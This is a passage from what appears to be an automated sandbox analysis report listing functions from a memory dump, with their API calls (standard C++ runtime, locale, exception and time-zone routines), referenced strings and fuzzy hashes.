API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 212f63afdc559a27136fbc3d321536252d74ece3e1a2dfff44d8aad5d07f967f
Instruction ID: 36659fa113f989637416a9e81e08acb4ad8f06632a8f18e2a956507b894c6d8f
Opcode Fuzzy Hash: 212f63afdc559a27136fbc3d321536252d74ece3e1a2dfff44d8aad5d07f967f
Instruction Fuzzy Hash: CB119A329042698BCF15DBA5C884EEE7775AF84768F26041ED611AB290DF34DE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48037A, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480381
std::_Lockit::_Lockit.LIBCPMT ref: 6D48038B

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

codecvt.LIBCPMT ref: 6D4803C5
std::_Facet_Register.LIBCPMT ref: 6D4803DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4803FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48041A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 2494126e5f2ecdba6ad5ddc379346ff9048f667f21834cef9a29b74883c5474b
Instruction ID: 2f258415c9a8f746fcb9e5d6df13fc1a86bb0639220ee111e2f22b56d37eb188
Opcode Fuzzy Hash: 2494126e5f2ecdba6ad5ddc379346ff9048f667f21834cef9a29b74883c5474b
Instruction Fuzzy Hash: D511AC7290422A8BCF14DBA6C890EEE7775AF85764F26040DD610AB391DF74DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D453D60, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453D8D

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,6D479030,6D4D78BB,00000000,?,00000000,?,?,?,?,6D479030,6D4D78BB,6D5308C4,?,6D4D78BB), ref: 6D492554

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453DD2

Strings

ios_base::eofbit set, xrefs: 6D453DA6
ios_base::badbit set, xrefs: 6D453D97, 6D453DC2
ios_base::failbit set, xrefs: 6D453C5F, 6D453DA1

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3476068407-1866435925
Opcode ID: 563c7f6437416232ccb65ec726f1759e41f72fa4395bd165556e5ab48eff97b2
Instruction ID: c962dc36d7df6517e4e8b89c470fb4bae7a4d8d95f1a26dd41865fa0fd59aad2
Opcode Fuzzy Hash: 563c7f6437416232ccb65ec726f1759e41f72fa4395bd165556e5ab48eff97b2
Instruction Fuzzy Hash: 510149738182447BCB14CD58C84AFA973D86B41214F54855DFB949B182FB32ED19C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BAE11, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D4BADA7,00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002), ref: 6D4BAE31
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D4BAE44
FreeLibrary.KERNEL32(00000000,?,?,?,6D4BADA7,00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002,00000000), ref: 6D4BAE67

Strings

CorExitProcess, xrefs: 6D4BAE3C
mscoree.dll, xrefs: 6D4BAE2A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7a1812a815ed392977ac766b88d7ca70844b1d335c3078da434e356f2a8ce4e0
Instruction ID: e02290dc86b04233e2f2b8b2e8679f6edb898cb4b566691209f55b60665c633d
Opcode Fuzzy Hash: 7a1812a815ed392977ac766b88d7ca70844b1d335c3078da434e356f2a8ce4e0
Instruction Fuzzy Hash: AEF06231900208BBDF119FA5CC49FAEBFF5EF09711F114169F905A6640DB718E40CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D471D90, Relevance: 7.8, APIs: 5, Instructions: 254COMMON

Download Yara Rule

APIs

__Tolower.LIBCPMT ref: 6D471DE1
__Tolower.LIBCPMT ref: 6D471E0E
__Tolower.LIBCPMT ref: 6D471EFD

Part of subcall function 6D47A4F6: ___crtLCMapStringA.LIBCPMT ref: 6D47A5CD

Concurrency::cancel_current_task.LIBCPMT ref: 6D47206A
Concurrency::cancel_current_task.LIBCPMT ref: 6D47206F

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Tolower$Concurrency::cancel_current_task$String___crt
String ID:
API String ID: 3933662966-0
Opcode ID: 6741194ad1634bc59caec1ae9f38c558d5739785c48ea6facd471358ad80de13
Instruction ID: a750ac14e8c91bb0b1e22e3ce6ea7e9e710779738135633f065da6cdc3286ced
Opcode Fuzzy Hash: 6741194ad1634bc59caec1ae9f38c558d5739785c48ea6facd471358ad80de13
Instruction Fuzzy Hash: 62A19B759046469FCB24CF28C890AAABBF1FF59310F24C55EE8A99B741D731ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8A45, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8A9D

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c114ee3486ffc409e25c6cab92bdfb41655b7dd88954172b20faa217a1f85030
Instruction ID: 2b89349fec85de3f5a443b8285afcf0bb47ee99fe55d698883624f822fbcaf51
Opcode Fuzzy Hash: c114ee3486ffc409e25c6cab92bdfb41655b7dd88954172b20faa217a1f85030
Instruction Fuzzy Hash: 4151EBB9904209AFDF10DF6ACC84D7E77B8EF45314B22426FE56497690E7309E41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BBE39, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4BBEAB
_free.LIBCMT ref: 6D4BBECB

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3420a533071c39359d1666f58fb0fd03dd39663e2802c2fbc68213839278820b
Instruction ID: 4ffa1ed2bcd699370cdec3dc2b3c2a93f6a1acef54e5317ec57aec5db1565ef9
Opcode Fuzzy Hash: 3420a533071c39359d1666f58fb0fd03dd39663e2802c2fbc68213839278820b
Instruction Fuzzy Hash: B241A176A002009BDB14CF79C880E5AB7B5EF89714F2645A9E615EB351DB31AD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D45CB80, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45CBB4
std::_Lockit::_Lockit.LIBCPMT ref: 6D45CBD4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45CBFC
std::_Facet_Register.LIBCPMT ref: 6D45CCE7
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45CD19

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 84ec3548407c2ee0432f4443497f954272dff98912ffeffc3c7680409f360b08
Instruction ID: cc3fb07c2b6c34cd5eac641f2b4425ccae077610705992838d3b2295ce2ef26a
Opcode Fuzzy Hash: 84ec3548407c2ee0432f4443497f954272dff98912ffeffc3c7680409f360b08
Instruction Fuzzy Hash: 9F51DCB0904245DFDB26CF58C480FAEBBB4EB42354F22815DD856AB380DB75AE45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480D34, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480D3B
std::_Lockit::_Lockit.LIBCPMT ref: 6D480D45

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480D96
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480DB6
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480DD4

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1120f240b22f850d85d92d6c53b96acba9058cfcecd3548ce575b19eae614d62
Instruction ID: 11ed2e06494746cad1f0524cea18405a93ba614d5b12e7c57329dac7e4d6a8ec
Opcode Fuzzy Hash: 1120f240b22f850d85d92d6c53b96acba9058cfcecd3548ce575b19eae614d62
Instruction Fuzzy Hash: C211EC328042298BCF04CFA5C854EEE77B5AF81358F26040DE601AB390DF30EE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480DDA, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480DE1
std::_Lockit::_Lockit.LIBCPMT ref: 6D480DEB

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480E5C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480E7A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 7e0ed97f5752c06d332e9295b5a2884c44a68ae6b0bcf3870ea8682a9719ee77
Instruction ID: 78d17f2754967a5607c9d52cba2232b9a4f0e6a02ab3608d9c84952614b99449
Opcode Fuzzy Hash: 7e0ed97f5752c06d332e9295b5a2884c44a68ae6b0bcf3870ea8682a9719ee77
Instruction Fuzzy Hash: E8119A7290422A9BCF15DBA5C884EFE7775AF85794F26040DE611AB390DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CC38, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48CC3F
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CC49

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CC9A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CCBA
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CCD8

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: e314f28ba01c9ed6fd584a92007fe521206b716032ba1e36dd1428275878db8c
Instruction ID: c3ad9c35b194fccf1a0c64262b013db24cb39f7004ce579877582aee004c65bd
Opcode Fuzzy Hash: e314f28ba01c9ed6fd584a92007fe521206b716032ba1e36dd1428275878db8c
Instruction Fuzzy Hash: 0A11A0329041298BCF04DBA5C840EFE7775AF85354F26050ED610AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CCDE, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48CCE5
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CCEF

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CD40
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CD60
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CD7E

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a9f26cc067bd92913bbbe13ba6455fa9a3eee717c1871c7c32d2bbcafcc4c75f
Instruction ID: 44f282b8ddae375fc04f14845d1e7b67e1298913ab9a58ad5f1460d4373d4e79
Opcode Fuzzy Hash: a9f26cc067bd92913bbbe13ba6455fa9a3eee717c1871c7c32d2bbcafcc4c75f
Instruction Fuzzy Hash: 2911A0328041598BCF14DBA5C840EEE7BB5BF85754F26051DD6116B2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480C8E, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480C95
std::_Lockit::_Lockit.LIBCPMT ref: 6D480C9F

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480CF0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480D10
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480D2E

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 88b75f3488349ec23db59f1b7969a7d7ec371b7adbd489d570d8dc2e5f8a97b6
Instruction ID: 3fcc104816214e690e977a3a015f63bbb5b5160fb19c4fa7cf3cf6e133f50979
Opcode Fuzzy Hash: 88b75f3488349ec23db59f1b7969a7d7ec371b7adbd489d570d8dc2e5f8a97b6
Instruction Fuzzy Hash: 8A11AC328041698BCF05DFA6C884EEE77B5AF84354F26440EE615AB290DF34EE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480F26, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480F2D
std::_Lockit::_Lockit.LIBCPMT ref: 6D480F37

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480F88
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480FA8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480FC6

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 96bebdff1b39ae04b617b13c0cd01279103d6fe55d95ed549a8a23d982a6b1e9
Instruction ID: 5f9de9f948c43be1c1318fee31d502832e5cb35c9637a851bcae922b45bd7756
Opcode Fuzzy Hash: 96bebdff1b39ae04b617b13c0cd01279103d6fe55d95ed549a8a23d982a6b1e9
Instruction Fuzzy Hash: 72119E329042199BCF05DF66C840EEE7776BF84754F26440DE614AB291DFB4DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480FCC, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480FD3
std::_Lockit::_Lockit.LIBCPMT ref: 6D480FDD

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48102E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48104E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48106C

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 57aba7de2f5c2e9117eb2f176dc062e83fdf128e36b4587527588d5ec09a9ad3
Instruction ID: 89bf6edb30f7e89e9c9809681f86f3c138b17145cd3dd8c42011dc5e0c1290b0
Opcode Fuzzy Hash: 57aba7de2f5c2e9117eb2f176dc062e83fdf128e36b4587527588d5ec09a9ad3
Instruction Fuzzy Hash: 25118C329042598BCF15DBA4C884EEE7775BF85394F26040ED621AB291DF349E018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CED0, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48CED7
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CEE1

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CF32
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CF52
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CF70

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: b7cde710ff2c6dce3f9ec87fe09201272574e6f5ae50f4baa670f6ffe1be09c1
Instruction ID: a833da3f418ed1dc61409a7b590e3b8ceabe871af1ddbfb45da1472c377a8001
Opcode Fuzzy Hash: b7cde710ff2c6dce3f9ec87fe09201272574e6f5ae50f4baa670f6ffe1be09c1
Instruction Fuzzy Hash: E011AC328041299BCF05DFA5C840EEE7B75AF84764F26450EE614AB391DF74EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480950, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480957
std::_Lockit::_Lockit.LIBCPMT ref: 6D480961

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D4809B2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4809D2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4809F0

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9ac6253f4558ef14a151622e27e2ebf6923aea6d13917af3436a36ee47abdba9
Instruction ID: 79edab8c93175075049ccbc22e27aaddad4a8d8bf4e9fd0dc66c7a30cde1445d
Opcode Fuzzy Hash: 9ac6253f4558ef14a151622e27e2ebf6923aea6d13917af3436a36ee47abdba9
Instruction Fuzzy Hash: E011AC72805129CBCF15DFA5C854EEE7775AF85358F26040DE614AB290DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B9F2, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D47B9F9
std::_Lockit::_Lockit.LIBCPMT ref: 6D47BA03

